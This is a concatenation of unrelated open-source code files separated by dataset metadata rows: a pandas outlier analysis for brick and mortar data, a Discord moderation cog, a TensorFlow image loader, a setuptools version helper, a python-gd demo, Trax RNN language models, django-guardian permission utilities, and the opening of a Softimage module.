std3_insulated_ratio_.to_excel(writer, 'Insulated')
writer.save()
def uninsulated():
"""Computes the outliers for the uninsulated cases"""
outliers_total_uninsulated = (total_uninsulated_4a.shape[0] -
total_uninsulated_4a.sub(total_uninsulated_4a.mean())
.div(total_uninsulated_4a.std()).abs().lt(3).sum()) / total_uninsulated_4a.shape[0]
outliers_zd_high_uninsulated = (dresdenzd_highratio_uninsulated_4a.shape[0] -
dresdenzd_highratio_uninsulated_4a.sub(dresdenzd_highratio_uninsulated_4a.mean())
.div(dresdenzd_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzd_highratio_uninsulated_4a.shape[0]
outliers_zp_high_uninsulated = (dresdenzp_highratio_uninsulated_4a.shape[0] -
dresdenzp_highratio_uninsulated_4a.sub(dresdenzp_highratio_uninsulated_4a.mean())
.div(dresdenzp_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzp_highratio_uninsulated_4a.shape[0]
outliers_pd_high_uninsulated = (postdam_highratio_uninsulated_4a.shape[0] -
postdam_highratio_uninsulated_4a.sub(postdam_highratio_uninsulated_4a.mean())
.div(postdam_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ postdam_highratio_uninsulated_4a.shape[0]
outliers_zd_low_uninsulated = (dresdenzd_lowratio_uninsulated_4a.shape[0] -
dresdenzd_lowratio_uninsulated_4a.sub(dresdenzd_lowratio_uninsulated_4a.mean())
.div(dresdenzd_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzd_lowratio_uninsulated_4a.shape[0]
outliers_zp_low_uninsulated = (dresdenzp_lowratio_uninsulated_4a.shape[0] -
dresdenzp_lowratio_uninsulated_4a.sub(dresdenzp_lowratio_uninsulated_4a.mean())
.div(dresdenzp_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzp_lowratio_uninsulated_4a.shape[0]
outliers_pd_low_uninsulated = (postdam_lowratio_uninsulated_4a.shape[0] -
postdam_lowratio_uninsulated_4a.sub(postdam_lowratio_uninsulated_4a.mean())
.div(postdam_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ postdam_lowratio_uninsulated_4a.shape[0]
outliers_uninsulated_ratio_ = pd.concat([outliers_total_uninsulated, outliers_zd_high_uninsulated,
outliers_zp_high_uninsulated, outliers_pd_high_uninsulated,
outliers_zd_low_uninsulated, outliers_zp_low_uninsulated,
outliers_pd_low_uninsulated], axis=1)
outliers_uninsulated_ratio_.columns = ["Brick: All - Mortar: All - Insulation: None",
"Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: None",
"Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: None",
"Brick: Potsdam - Mortar: High Cement Ratio - Insulation: None",
"Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: None",
"Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: None",
"Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: None"]
return outliers_uninsulated_ratio_
def insulated():
"""Computes the outliers for the insulated cases"""
outliers_total_insulated = (total_insulated_4a.shape[0] - total_insulated_4a.sub(total_insulated_4a.mean())
.div(total_insulated_4a.std()).abs().lt(3).sum()) / total_insulated_4a.shape[0]
outliers_zd_high_insulated = (dresdenzd_highratio_insulated_4a.shape[0] -
dresdenzd_highratio_insulated_4a.sub(dresdenzd_highratio_insulated_4a.mean())
.div(dresdenzd_highratio_insulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzd_highratio_insulated_4a.shape[0]
outliers_zp_high_insulated = (dresdenzp_highratio_insulated_4a.shape[0] -
dresdenzp_highratio_insulated_4a.sub(dresdenzp_highratio_insulated_4a.mean())
.div(dresdenzp_highratio_insulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzp_highratio_insulated_4a.shape[0]
outliers_pd_high_insulated = (postdam_highratio_insulated_4a.shape[0] -
postdam_highratio_insulated_4a.sub(postdam_highratio_insulated_4a.mean())
.div(postdam_highratio_insulated_4a.std()).abs().lt(3).sum()) \
/ postdam_highratio_insulated_4a.shape[0]
outliers_zd_low_insulated = (dresdenzd_lowratio_insulated_4a.shape[0] -
dresdenzd_lowratio_insulated_4a.sub(dresdenzd_lowratio_insulated_4a.mean())
.div(dresdenzd_lowratio_insulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzd_lowratio_insulated_4a.shape[0]
outliers_zp_low_insulated = (dresdenzp_lowratio_insulated_4a.shape[0] -
dresdenzp_lowratio_insulated_4a.sub(dresdenzp_lowratio_insulated_4a.mean())
.div(dresdenzp_lowratio_insulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzp_lowratio_insulated_4a.shape[0]
outliers_pd_low_insulated = (postdam_lowratio_insulated_4a.shape[0] -
postdam_lowratio_insulated_4a.sub(postdam_lowratio_insulated_4a.mean())
.div(postdam_lowratio_insulated_4a.std()).abs().lt(3).sum()) \
/ postdam_lowratio_insulated_4a.shape[0]
std2_insulated_ratio_ = pd.concat([outliers_total_insulated, outliers_zd_high_insulated,
outliers_zp_high_insulated, outliers_pd_high_insulated,
outliers_zd_low_insulated, outliers_zp_low_insulated,
outliers_pd_low_insulated], axis=1)
std2_insulated_ratio_.columns = ["Brick: All - Mortar: All - Insulation: None",
"Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: Calcium Silicate",
"Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: Calcium Silicate",
"Brick: Potsdam - Mortar: High Cement Ratio - Insulation: Calcium Silicate",
"Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: Calcium Silicate",
"Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: Calcium Silicate",
"Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: Calcium Silicate"]
return std2_insulated_ratio_
#std3_ratio(False, True)
|
mit
| -2,501,209,804,834,219,500
| 55.575851
| 120
| 0.600088
| false
| 3.176982
| false
| false
| false
|
MaT1g3R/YasenBaka
|
cogs/moderation.py
|
1
|
3215
|
from discord import DiscordException, Forbidden, HTTPException
from discord.ext import commands
from discord.ext.commands import Context
from bot import Yasen
from scripts.checks import has_manage_message, is_admin, no_pm
from scripts.discord_utils import leading_members
from scripts.helpers import parse_number
class Moderation:
"""
Moderation commands.
"""
__slots__ = ('bot',)
def __init__(self, bot: Yasen):
self.bot = bot
def __local_check(self, ctx: Context):
return no_pm(ctx)
@commands.command()
@commands.check(is_admin)
async def masspm(self, ctx: Context, *, args: str = None):
"""
Description: Send pm to all mentioned members.
Restriction: Cannot be used in private message.
Permission Required: Administrator
Usage: "`{prefix}masspm @mention0 @mention1 my message`"
"""
if not args:
await ctx.send(
'Please mention at least one member and include '
'a message to send.'
)
return
members, msg = leading_members(ctx, args)
if not members:
await ctx.send('Please mention at least one member.')
return
if not msg:
await ctx.send('Please enter a message for me to send.')
return
sent = []
failed = []
for m in members:
try:
await m.send(msg)
sent.append(m.display_name)
except DiscordException as e:
self.bot.logger.warn(str(e))
failed.append(m.display_name)
success_msg = (f'PM sent to the following members:'
f'\n```\n{", ".join(sent)}\n```') if sent else ''
failed_msg = (f'Failed to send PMs to the following members:'
f'\n```\n{", ".join(failed)}\n```') if failed else ''
if success_msg or failed_msg:
await ctx.send(f'{success_msg}{failed_msg}')
@commands.command()
@commands.check(has_manage_message)
async def purge(self, ctx: Context, num=None):
"""
Description: Purge up to 99 messages in the current channel.
Restriction: |
Cannot be used in private message.
Can only purge from 1 to 99 (inclusive) messages at once.
Permission Required: Manage Messages
Usage: "`{prefix}purge num` where num is a number between 1 and 99."
"""
num = parse_number(num, int) or 0
if not 1 <= num <= 99:
await ctx.send(
'Please enter a number between 1 and 99.', delete_after=3
)
return
try:
deleted = await ctx.channel.purge(limit=num + 1)
except Forbidden:
await ctx.send('I do not have the permissions to purge messages.')
except HTTPException:
await ctx.send(':no_entry_sign: Purging messages failed.')
else:
deleted_num = len(deleted) - 1
msg_str = (f'{deleted_num} message' if num == 1
else f'{deleted_num} messages')
await ctx.send(f':recycle: Purged {msg_str}.', delete_after=3)
|
apache-2.0
| -242,369,800,436,003,700
| 35.534091
| 78
| 0.565474
| false
| 4.197128
| false
| false
| false
|
ceroytres/cat_nets
|
cat_nets/datasets/read_pets.py
|
1
|
1970
|
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import tensorflow as tf
import csv
def catClassification_loader(path):
cat_names = ['Abyssinian','Bengal','Birman','Bombay','British_Shorthair',
'Egyptian_Mau','Maine_Coon','Persian','Ragdoll','Russian_Blue',
'Siamese','Sphynx']
cat_dict = dict(zip(cat_names,range(len(cat_names))))
labels_list, filename_list = [], []
with open(path,mode = 'r') as csvfile:
reader = csv.reader(csvfile, delimiter = ',')
for row in reader:
labels_list.append(cat_dict[row[0]])
filename_list.append(row[1])
labels_list = tf.convert_to_tensor(labels_list)
images_list = tf.convert_to_tensor(filename_list)
filename_queue = tf.train.slice_input_producer([labels_list,images_list], shuffle=True)
label = filename_queue[0]
filename = filename_queue[1]
raw_image = tf.read_file(filename)
image = tf.image.decode_jpeg(raw_image, channels = 3)
cat_dict = dict(zip(cat_dict.values(),cat_dict.keys()))
return image, label, cat_dict
# image = tf.image.resize_images(image,image_size,
# method = tf.image.ResizeMethod.BILINEAR,
# align_corners= True)
# image = tf.cast(image, tf.uint8)
#
# batch_size = batch_size
#
# capacity = min_after_dequeue + 3 * batch_size
#
# image_batch, label_batch = tf.train.shuffle_batch([image,label],
# batch_size = batch_size,
# capacity = capacity,
# min_after_dequeue = min_after_dequeue,
# num_threads=num_threads)
# return image_batch,label_batch
|
mit
| -7,524,138,306,632,480,000
| 32.561404
| 91
| 0.540102
| false
| 3.594891
| false
| false
| false
|
rwgdrummer/maskgen
|
setuptools-version/setuptools_maskgen_version.py
|
1
|
1613
|
from pkg_resources import get_distribution
from subprocess import check_output
import requests
import json
repos = 'rwgdrummer/maskgen'
giturl = 'https://api.github.com/repos'
def get_commit():
url = giturl + '/' + repos + '/pulls?state=closed'
resp = requests.get(url)
if resp.status_code == requests.codes.ok:
content = json.loads(resp.content)
for item in content:
if 'merged_at' in item and 'merge_commit_sha' in item:
return item['merge_commit_sha']
return None
def get_version():
import os
filename = 'VERSION'
#if os.path.exists('.git/ORIG_HEAD'):
# filename = '.git/ORIG_HEAD'
#else:
print os.path.abspath(filename)
with open(filename) as fp:
return fp.readline()
def validate_version_format(dist, attr, value):
try:
version = get_version().strip()
except:
version = get_distribution(dist.get_name()).version
else:
version = format_version(version=version, fmt=value)
dist.metadata.version = version
def format_version(version, fmt='{gitsha}'):
return fmt.format(gitsha=version)
if __name__ == "__main__":
# determine version from git
git_version = get_version().strip()
git_version = format_version(version=git_version)
# monkey-patch `setuptools.setup` to inject the git version
import setuptools
original_setup = setuptools.setup
def setup(version=None, *args, **kw):
return original_setup(version=git_version, *args, **kw)
setuptools.setup = setup
# import the packages's setup module
import setup
|
bsd-3-clause
| -12,361,799,161,684,228
| 27.298246
| 66
| 0.651581
| false
| 3.708046
| false
| false
| false
|
Solomoriah/gdmodule
|
demo/gddemo.py
|
1
|
1024
|
#!/usr/bin/env python
import gd, os, cStringIO, urllib2
os.environ["GDFONTPATH"] = "."
FONT = "Pacifico"
def simple():
im = gd.image((200, 200))
white = im.colorAllocate((255, 255, 255))
black = im.colorAllocate((0, 0, 0))
red = im.colorAllocate((255, 0, 0))
blue = im.colorAllocate((0, 0, 255))
im.colorTransparent(white)
im.interlace(1)
im.rectangle((0,0),(199,199),black)
im.arc((100,100),(195,175),0,360,blue)
im.fill((100,100),red)
print im.get_bounding_rect(FONT, 12.0, 0.0, (10, 100), "Hello Python")
im.string_ttf(FONT, 20.0, 0.0, (10, 100), "Hello Python", black)
f=open("xx.png","w")
im.writePng(f)
f.close()
f=open("xx.jpg", "w")
im.writeJpeg(f,100)
f.close()
f=cStringIO.StringIO()
im.writePng(f)
print "PNG size:", len(f.getvalue())
f.close()
f = urllib2.urlopen("http://www.gnu.org/graphics/gnu-head-sm.jpg")
im = gd.image(f, "jpg")
f.close()
print "GNU Image Size:", im.size()
simple()
|
bsd-3-clause
| 8,312,121,099,719,976,000
| 20.787234
| 74
| 0.583008
| false
| 2.708995
| false
| false
| false
|
quentinl-c/network_testing-client
|
app/editor.py
|
1
|
2631
|
from collaborator import Collaborator
import os
import random
import logging
import time
logging.basicConfig(filename=__name__ + '.log', level=logging.DEBUG)
logger = logging.getLogger(__name__)
HOME_DIR = os.getenv('HOME_DIR', '/home/')
WRITER_SELECTOR = 'ace_text-input'
READER_SELECTOR = 'ace_content'
FILTER = '[Tracker]'
tempo = 15 # Client will wait 20 secondes befores getting results
class Editor(Collaborator):
"""docstring for Editor"""
def __init__(self, controller, target, typing_speed, word_to_type):
Collaborator.__init__(self, controller, target)
logger.debug("=== Editor is being instanciated ===")
self.word_to_type = None
self.counter = 0
if len(word_to_type) > 0:
selector = WRITER_SELECTOR
self.word_to_type = word_to_type
else:
selector = READER_SELECTOR
self.word_to_type = None
self.select = None
while self.select is None:
self._driver.implicitly_wait(20)
self.select = self._driver.find_element_by_class_name(
selector)
def run(self):
self.alive = True
if self.word_to_type is not None:
beg_time = random.uniform(2.0, 6.0)
time.sleep(beg_time)
while self.alive:
if self.word_to_type is not None:
w = ''.join((self.word_to_type, ';',
str(self.counter).zfill(6)))
self.select.send_keys(w)
self.counter += 1
time.sleep(2)
else:
self.select.text
self.saveTxt()
def getResults(self):
time.sleep(tempo)
logger.debug("=== Get results from log files ===")
tmp = []
self.alive = False
time.sleep(tempo)
with open(self._log_path, 'r') as content_file:
for line in content_file:
beg = line.find(FILTER)
if beg != -1:
rec = line[beg:].split(',')[0].split('"')[0]
tmp.append(rec)
content = '\n'.join(tmp)
self._controller.sendResults(content)
def saveTxt(self):
if self.word_to_type is not None:
self.select = None
while self.select is None:
self._driver.implicitly_wait(20)
self.select = self._driver.find_element_by_class_name(
READER_SELECTOR)
content = self.select.text
file = open(HOME_DIR + str(self._controller.id) + '_content.txt', 'w')
file.write(content)
file.close()
|
gpl-3.0
| 31,586,578,786,040,000
| 30.698795
| 78
| 0.54618
| false
| 3.852123
| false
| false
| false
|
google/trax
|
trax/models/rnn.py
|
1
|
9301
|
# coding=utf-8
# Copyright 2021 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""RNNs (recursive neural networks)."""
from trax import layers as tl
from trax.fastmath import numpy as jnp
def RNNLM(vocab_size,
d_model=512,
n_layers=2,
rnn_cell=tl.LSTMCell,
rnn_cell_d_state_multiplier=2,
dropout=0.1,
mode='train'):
"""Returns an RNN language model.
This model performs autoregressive language modeling:
- input: rank 2 tensor representing a batch of text strings via token IDs
plus padding markers; shape is (batch_size, sequence_length). The tensor
elements are integers in `range(vocab_size)`, and `0` values mark padding
positions.
- output: rank 3 tensor representing a batch of log-probability
distributions for each sequence position over possible token IDs;
shape is (batch_size, sequence_length, `vocab_size`).
Args:
vocab_size: Input vocabulary size -- each element of the input tensor
should be an integer in `range(vocab_size)`. These integers typically
represent token IDs from a vocabulary-based tokenizer.
d_model: Embedding depth throughout the model.
n_layers: Number of RNN layers.
rnn_cell: Type of RNN cell; must be a subclass of `Layer`.
rnn_cell_d_state_multiplier: Multiplier for feature depth of RNN cell
state.
dropout: Stochastic rate (probability) for dropping an activation value
when applying dropout.
mode: If `'predict'`, use fast inference; if `'train'` apply dropout.
Returns:
An RNN language model as a layer that maps from a tensor of tokens
to activations over a vocab set.
"""
if n_layers != 2: # TODO(jonni): Remove n_layers arg, if it can't vary?
raise ValueError(f'Number of layers must be set to 2; instead got'
f' {n_layers}.')
def MultiRNNCell():
"""Multi-layer RNN cell."""
return tl.Serial(
tl.Parallel([], tl.Split(n_items=n_layers)),
tl.SerialWithSideOutputs(
[rnn_cell(n_units=d_model) for _ in range(n_layers)]),
tl.Parallel([], tl.Concatenate(n_items=n_layers))
)
zero_state = tl.MakeZeroState( # pylint: disable=no-value-for-parameter
depth_multiplier=n_layers * rnn_cell_d_state_multiplier
)
return tl.Serial(
tl.ShiftRight(mode=mode),
tl.Embedding(vocab_size, d_model),
tl.Dropout(rate=dropout, mode=mode),
tl.Branch([], zero_state),
tl.Scan(MultiRNNCell(), axis=1, mode=mode),
tl.Select([0], n_in=2), # Drop RNN state.
tl.Dense(vocab_size),
)
def GRULM(vocab_size=256,
d_model=512,
n_layers=1,
mode='train'):
"""Returns a GRU (gated recurrent unit) language model.
This model performs autoregressive language modeling:
- input: rank 2 tensor representing a batch of text strings via token IDs
plus padding markers; shape is (batch_size, sequence_length). The tensor
elements are integers in `range(vocab_size)`, and `0` values mark padding
positions.
- output: rank 3 tensor representing a batch of log-probability
distributions for each sequence position over possible token IDs;
shape is (batch_size, sequence_length, `vocab_size`).
Args:
vocab_size: Input vocabulary size -- each element of the input tensor
should be an integer in `range(vocab_size)`. These integers typically
represent token IDs from a vocabulary-based tokenizer.
d_model: Embedding depth throughout the model.
n_layers: Number of GRU layers.
mode: If `'predict'`, use fast inference (and omit the right shift).
Returns:
A GRU language model as a layer that maps from a tensor of tokens
to activations over a vocab set.
"""
return tl.Serial(
tl.ShiftRight(mode=mode),
tl.Embedding(vocab_size, d_model),
[tl.GRU(d_model, mode=mode) for _ in range(n_layers)],
tl.Dense(vocab_size),
)
# TODO(jonni): Decide names (here and Transformer): input/source, output/target
# TODO(jonni): Align with Transfomer: (attention-)dropout, n-(attention-)heads
def LSTMSeq2SeqAttn(input_vocab_size=256,
target_vocab_size=256,
d_model=512,
n_encoder_layers=2,
n_decoder_layers=2,
n_attention_heads=1,
attention_dropout=0.0,
mode='train'):
"""Returns an LSTM sequence-to-sequence model with attention.
This model is an encoder-decoder that performs tokenized string-to-string
("source"-to-"target") transduction:
- inputs (2):
- source: rank 2 tensor representing a batch of text strings via token
IDs plus padding markers; shape is (batch_size, sequence_length). The
tensor elements are integers in `range(input_vocab_size)`, and `0`
values mark padding positions.
- target: rank 2 tensor representing a batch of text strings via token
IDs plus padding markers; shape is (batch_size, sequence_length). The
tensor elements are integers in `range(output_vocab_size)`, and `0`
values mark padding positions.
- output: rank 3 tensor representing a batch of log-probability
distributions for each sequence position over possible token IDs;
shape is (batch_size, sequence_length, `vocab_size`).
An example use would be to translate (tokenized) sentences from English to
German.
The model works as follows:
* Input encoder runs on the input tokens and creates activations that
are used as both keys and values in attention.
* Pre-attention decoder runs on the targets and creates
activations that are used as queries in attention.
* Attention runs on the queries, keys and values masking out input padding.
* Decoder runs on the result, followed by a cross-entropy loss.
Args:
input_vocab_size: Input vocabulary size -- each element of the input tensor
should be an integer in `range(vocab_size)`. These integers typically
represent token IDs from a vocabulary-based tokenizer.
target_vocab_size: Target vocabulary size.
d_model: Final dimension of tensors at most points in the model, including
the initial embedding output.
n_encoder_layers: Number of LSTM layers in the encoder.
n_decoder_layers: Number of LSTM layers in the decoder after attention.
n_attention_heads: Number of attention heads.
attention_dropout: Stochastic rate (probability) for dropping an activation
value when applying dropout within an attention block.
mode: If `'predict'`, use fast inference. If `'train'`, each attention block
will include dropout; else, it will pass all values through unaltered.
Returns:
An LSTM sequence-to-sequence model as a layer that maps from a
source-target tokenized text pair to activations over a vocab set.
"""
input_encoder = tl.Serial(
tl.Embedding(input_vocab_size, d_model),
[tl.LSTM(d_model) for _ in range(n_encoder_layers)],
)
pre_attention_decoder = tl.Serial(
tl.ShiftRight(mode=mode),
tl.Embedding(target_vocab_size, d_model),
tl.LSTM(d_model, mode=mode),
)
def PrepareAttentionInputs():
"""Layer that prepares queries, keys, values and mask for attention."""
def F(encoder_activations, decoder_activations, input_tokens):
keys = values = encoder_activations
queries = decoder_activations
# Mask is 1 where inputs are not padding (0) and 0 where they are padding.
mask = (input_tokens != 0)
# We need to add axes to the mask for attention heads and decoder length.
mask = jnp.reshape(mask, (mask.shape[0], 1, 1, mask.shape[1]))
# Broadcast so mask is [batch, 1 for heads, decoder-len, encoder-len].
mask = mask + jnp.zeros((1, 1, decoder_activations.shape[1], 1))
mask = mask.astype(jnp.float32)
return queries, keys, values, mask
return tl.Fn('PrepareAttentionInputs', F, n_out=4)
return tl.Serial( # in-toks, target-toks
tl.Select([0, 1, 0, 1]), # in-toks, target-toks, in-toks, target-toks
tl.Parallel(input_encoder, pre_attention_decoder),
PrepareAttentionInputs(), # q, k, v, mask, target-toks
tl.Residual(
tl.AttentionQKV(d_model, n_heads=n_attention_heads,
dropout=attention_dropout, mode=mode,
cache_KV_in_predict=True)
), # decoder-vecs, mask, target-toks
tl.Select([0, 2]), # decoder-vecs, target-toks
[tl.LSTM(d_model, mode=mode) for _ in range(n_decoder_layers)],
tl.Dense(target_vocab_size),
tl.LogSoftmax()
)
|
apache-2.0
| -1,051,844,559,480,561,700
| 39.973568
| 80
| 0.669498
| false
| 3.956189
| false
| false
| false
|
textcad/pyMagpie
|
magpie/motor.py
|
1
|
2154
|
#!/usr/bin/env python
from textcad import *
import magpie.utility
import magpie.hardware
class Stepper(component.Element):
def __init__(self,
size="GenericNEMA17",
negative=False,
negativeLength=10):
component.Element.__init__(self, name="stepper")
self.size = size
self.width = 0
self.length = 0
self.mountSpacing = 0
self.mountScrew = ""
self.flangeDiameter = 0
self.flangeHeight = 0
self.shaftLength = 0
self.shaftDiameter = 0
self.negative = negative
self.negativeLength = negativeLength
magpie.utility.get_dimensions(size=size, name="stepperMotor", obj=self)
self.holeLocations = [[self.mountSpacing/2, self.mountSpacing/2, 0],
[self.mountSpacing/2, -self.mountSpacing/2, 0],
[-self.mountSpacing/2, self.mountSpacing/2, 0],
[-self.mountSpacing/2, -self.mountSpacing/2, 0]]
self.screw = magpie.hardware.CapScrew(size=self.mountScrew)
self.location = [0, 0, 0]
self.color = [0.5, 0.5, 0.5]
self.construction = self._construction()
def _construction(self):
body = element.Cube([self.width, self.width, self.length])
body.center = [True, True, False]
body.location = [0, 0, -self.length]
flange = element.Cylinder(radius=self.flangeDiameter/2,
height=self.flangeHeight)
shaft = element.Cylinder(radius=self.shaftDiameter/2,
height=self.shaftLength+self.flangeHeight)
asm = body + flange + shaft
if self.negative:
# Flange
asm += element.Hole(radius=self.flangeDiameter/2,
height=self.negativeLength)
# Mount holes
for hole in self.holeLocations:
s = element.Hole(radius=self.screw.outerDiameter/2,
height=self.negativeLength)
s.location = hole
asm += s
return asm
|
mit
| -7,378,518,400,631,267,000
| 38.888889
| 79
| 0.551532
| false
| 3.930657
| false
| false
| false
|
restless/django-guardian
|
guardian/utils.py
|
1
|
4832
|
"""
django-guardian helper functions.
Functions defined within this module should be considered as django-guardian's
internal functionality. They are **not** guaranteed to be stable - which means
they actual input parameters/output type may change in future releases.
"""
import os
import logging
from itertools import chain
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import PermissionDenied
from django.http import HttpResponseForbidden, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext, TemplateDoesNotExist
from django.utils.http import urlquote
from guardian.compat import AnonymousUser
from guardian.compat import Group
from guardian.compat import User
from guardian.conf import settings as guardian_settings
from guardian.exceptions import NotUserNorGroup
logger = logging.getLogger(__name__)
abspath = lambda *p: os.path.abspath(os.path.join(*p))
def get_anonymous_user():
"""
Returns ``User`` instance (not ``AnonymousUser``) depending on
``ANONYMOUS_USER_ID`` configuration.
"""
return User.objects.get(id=guardian_settings.ANONYMOUS_USER_ID)
def get_groups_backref_name():
"""
Returns backreference name from Group to user model.
"""
return User._meta.get_field_by_name('groups')[0].related_query_name()
def get_identity(identity):
"""
Returns (user_obj, None) or (None, group_obj) tuple depending on what is
given. Also accepts AnonymousUser instance but would return ``User``
instead - it is convenient and needed for authorization backend to support
anonymous users.
:param identity: either ``User`` or ``Group`` instance
:raises ``NotUserNorGroup``: if cannot return proper identity instance
**Examples**::
>>> user = User.objects.create(username='joe')
>>> get_identity(user)
(<User: joe>, None)
>>> group = Group.objects.create(name='users')
>>> get_identity(group)
(None, <Group: users>)
>>> anon = AnonymousUser()
>>> get_identity(anon)
(<User: AnonymousUser>, None)
>>> get_identity("not instance")
...
NotUserNorGroup: User/AnonymousUser or Group instance is required (got )
"""
if isinstance(identity, AnonymousUser):
identity = get_anonymous_user()
if isinstance(identity, User):
return identity, None
elif isinstance(identity, Group):
return None, identity
raise NotUserNorGroup("User/AnonymousUser or Group instance is required "
"(got %s)" % identity)
def get_403_or_None(request, perms, obj=None, login_url=None,
redirect_field_name=None, return_403=False, accept_global_perms=False):
login_url = login_url or settings.LOGIN_URL
redirect_field_name = redirect_field_name or REDIRECT_FIELD_NAME
# Handles both original and with object provided permission check
# as ``obj`` defaults to None
has_permissions = False
# global perms check first (if accept_global_perms)
if accept_global_perms:
has_permissions = all(request.user.has_perm(perm) for perm in perms)
# if still no permission granted, try obj perms
if not has_permissions:
has_permissions = all(request.user.has_perm(perm, obj) for perm in perms)
if not has_permissions:
if return_403:
if guardian_settings.RENDER_403:
try:
response = render_to_response(
guardian_settings.TEMPLATE_403, {},
RequestContext(request))
response.status_code = 403
return response
except TemplateDoesNotExist, e:
if settings.DEBUG:
raise e
elif guardian_settings.RAISE_403:
raise PermissionDenied
return HttpResponseForbidden()
else:
path = urlquote(request.get_full_path())
tup = login_url, redirect_field_name, path
return HttpResponseRedirect("%s?%s=%s" % tup)
def clean_orphan_obj_perms():
"""
Seeks and removes all object permissions entries pointing at non-existing
targets.
Returns number of removed objects.
"""
from guardian.models import UserObjectPermission
from guardian.models import GroupObjectPermission
deleted = 0
# TODO: optimise
for perm in chain(UserObjectPermission.objects.all(),
GroupObjectPermission.objects.all()):
if perm.content_object is None:
logger.debug("Removing %s (pk=%d)" % (perm, perm.pk))
perm.delete()
deleted += 1
logger.info("Total removed orphan object permissions instances: %d" %
deleted)
return deleted
|
bsd-2-clause
| 8,977,540,974,672,123,000
| 32.324138
| 81
| 0.666598
| false
| 4.368897
| false
| false
| false
|
hamole/pbl8
|
pbl8_project/pbl/migrations/0003_auto.py
|
1
|
3700
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding M2M table for field studies_for on 'Treatment'
m2m_table_name = db.shorten_name(u'pbl_treatment_studies_for')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False)),
('study', models.ForeignKey(orm[u'pbl.study'], null=False))
))
db.create_unique(m2m_table_name, ['treatment_id', 'study_id'])
# Adding M2M table for field studies_against on 'Treatment'
m2m_table_name = db.shorten_name(u'pbl_treatment_studies_against')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False)),
('study', models.ForeignKey(orm[u'pbl.study'], null=False))
))
db.create_unique(m2m_table_name, ['treatment_id', 'study_id'])
# Removing M2M table for field treatment on 'Study'
db.delete_table(db.shorten_name(u'pbl_study_treatment'))
def backwards(self, orm):
# Removing M2M table for field studies_for on 'Treatment'
db.delete_table(db.shorten_name(u'pbl_treatment_studies_for'))
# Removing M2M table for field studies_against on 'Treatment'
db.delete_table(db.shorten_name(u'pbl_treatment_studies_against'))
# Adding M2M table for field treatment on 'Study'
m2m_table_name = db.shorten_name(u'pbl_study_treatment')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('study', models.ForeignKey(orm[u'pbl.study'], null=False)),
('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False))
))
db.create_unique(m2m_table_name, ['study_id', 'treatment_id'])
models = {
u'pbl.study': {
'Meta': {'ordering': "('title',)", 'object_name': 'Study'},
'author': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'funder': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'year': ('django.db.models.fields.IntegerField', [], {'default': '2014', 'max_length': '4'})
},
u'pbl.treatment': {
'Meta': {'ordering': "('name',)", 'object_name': 'Treatment'},
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'studies_against': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'studies_against+'", 'blank': 'True', 'to': u"orm['pbl.Study']"}),
'studies_for': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'studies_for+'", 'blank': 'True', 'to': u"orm['pbl.Study']"})
}
}
complete_apps = ['pbl']
|
mit
| -9,074,300,691,962,626,000
| 51.126761
| 195
| 0.592703
| false
| 3.285968
| false
| false
| false
|
blurstudio/cross3d
|
cross3d/softimage/external.py
|
1
|
4267
|
##
# \namespace cross3d.softimage.external
#
# \remarks This class can be used even outside of softimage. It gives you info on where
# softimage is installed, and allows you to run scripts in softimage.
# To Access this class use: cross3d.external('softimage')
#
# \author dougl
# \author Blur Studio
# \date 01/21/14
#
#------------------------------------------------------------------------------------------------------------------------
import os
import subprocess
import xml.etree.cElementTree as ET
from cross3d import Exceptions
from cross3d.constants import ScriptLanguage
